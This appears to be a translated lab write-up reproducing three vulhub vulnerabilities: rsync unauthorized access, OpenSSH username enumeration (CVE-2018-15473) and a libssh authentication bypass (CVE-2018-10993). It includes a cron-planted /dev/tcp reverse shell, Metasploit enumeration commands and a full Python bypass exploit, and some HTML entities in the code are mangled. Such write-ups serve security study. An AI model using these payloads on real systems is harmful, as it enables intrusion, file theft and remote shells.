Directory
- Service Attack and Defense – Application Protocol rsync &ssh Vulnerability Recurrence
-
- Vulnerability recurrence
-
- Improper configuration – unauthorized access – rsync file backup
- OpenSSH username enumeration vulnerability
- libssh authentication bypass vulnerability
Service Attack and Defense – Application Protocol rsync & ssh Vulnerability Recurrence
Vulnerability recurrence
Improper configuration-unauthorized access-rsync file backup
rsync default port: 873
rsync is the next data backup tool for Linux, supporting remote file transfer through rsync protocol and ssh protocol.
The rsync protocol listens to port 873 by default. If the target has the rsync service enabled and no ACL or access password is configured, we will be able to read and write the target server files.
Shooting range: vulhub
or vulfocus
Reference: rsync unauthorized access
Start the environment:
After the environment is started, we use the rsync command to access:
rsync rsync://your-ip:873/ //The shooting range maps the port rsync rsync://192.168.100.134:43983
You can view the list of module names:
Access list:
rsync rsync://your-ip:873/src/ rsync rsync://192.168.100.134:43983/src
Discovering that this is a Linux root directory, we can download arbitrary files:
rsync -av rsync://your-ip:873/src/etc/passwd ./ rsync rsync://192.168.100.134:43983/src/etc/passwd ./
You can also try uploading:
Upload the passwd file to the /src directory rsync ./passwd rsync://192.168.100.134:43983/src View verification: rsync rsync://192.168.100.134:43983/src
Due to the shooting range time, restart the shooting range and continue the experiment:
Rebound shell:
//Download crond file rsync -av rsync://192.168.100.134:39525/src/etc/crontab ./
Click to view:
Pay attention to the meaning of this line of statement:
Indicates that the run-parts –report /etc/cron.hourly command is executed at the 17th minute of every hour
17 * * * * root cd / & amp; & amp; run-parts --report /etc/cron.hourly
Create a shell file and write the rebound shell command:
#!/bin/bash /bin/bash -i > & amp; /dev/tcp/192.168.100.146/6666 0> & amp;1
Grant execution permissions:
chmod + x shell
Upload the written shell file to /etc/cron.hourly
rsync -av shell rsync://192.168.100.134:39525/src/etc/cron.hourly
Local monitoring:
nc -lvvp 6666
Just wait for the rebound.
OpenSSH username enumeration vulnerability
Reference: CVE-2018-15473
There is a username enumeration vulnerability before OpenSSH 7.7. Through this vulnerability, an attacker can determine whether a certain username exists in the target host.
Start the environment:
After the environment is started, we execute on the client
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p 20022
, enter the password vulhub
to log in to the container.
You can use exp directly to exploit:
exp link: CVE-2018-15473-Exploit
python sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt your-ip
Method Two:
You can also use msf for verification testing:
msfconsole //Enable msf search ssh //Search use 53 set rhosts 192.168.100.134 set rport 20022 set user_file "dictionary path" run
Configuration details:
implement:
Execution found that users such as root
, example
, vulhub
, and nobody
are existing users.
libssh authentication bypass vulnerability
Reference: libssh server-side permission authentication bypass vulnerability
libssh is a multi-platform C library that implements the SSHv2 protocol on both the client and server sides. A logic vulnerability has been discovered in libssh’s server-side state machine. An attacker can send a
MSG_USERAUTH_SUCCESS
message before authentication is successful. It can bypass authentication and access the target SSH server.
Turn on the shooting range environment:
After the environment is started, we can connect to the your-ip:2222
port (account password: myuser:mypassword
)
use:
Reference: CVE-2018-10993
According to the reference, the poc can be used directly:
#!/usr/bin/env python3 importsys import paramiko import socket import logging logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) bufsize=2048 def execute(hostname, port, command): sock = socket.socket() try: sock.connect((hostname, int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) client = transport.open_session(timeout=10) client.exec_command(command) # stdin = client.makefile("wb", bufsize) stdout = client.makefile("rb", bufsize) stderr = client.makefile_stderr("rb", bufsize) output = stdout.read() error = stderr.read() stdout.close() stderr.close() return (output + error).decode() except paramiko.SSHException as e: logging.exception(e) logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable") except socket.error: logging.debug("Unable to connect.") return None if __name__ == '__main__': print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
Perform verification:
python libssh_poc.py 192.168.100.134 2222 "id" python libssh_poc.py 192.168.100.134 2222 "whoami" python libssh_poc.py 192.168.100.134 2222 "touch /123.txt" python libssh_poc.py 192.168.100.134 2222 "ls /"
Created successfully: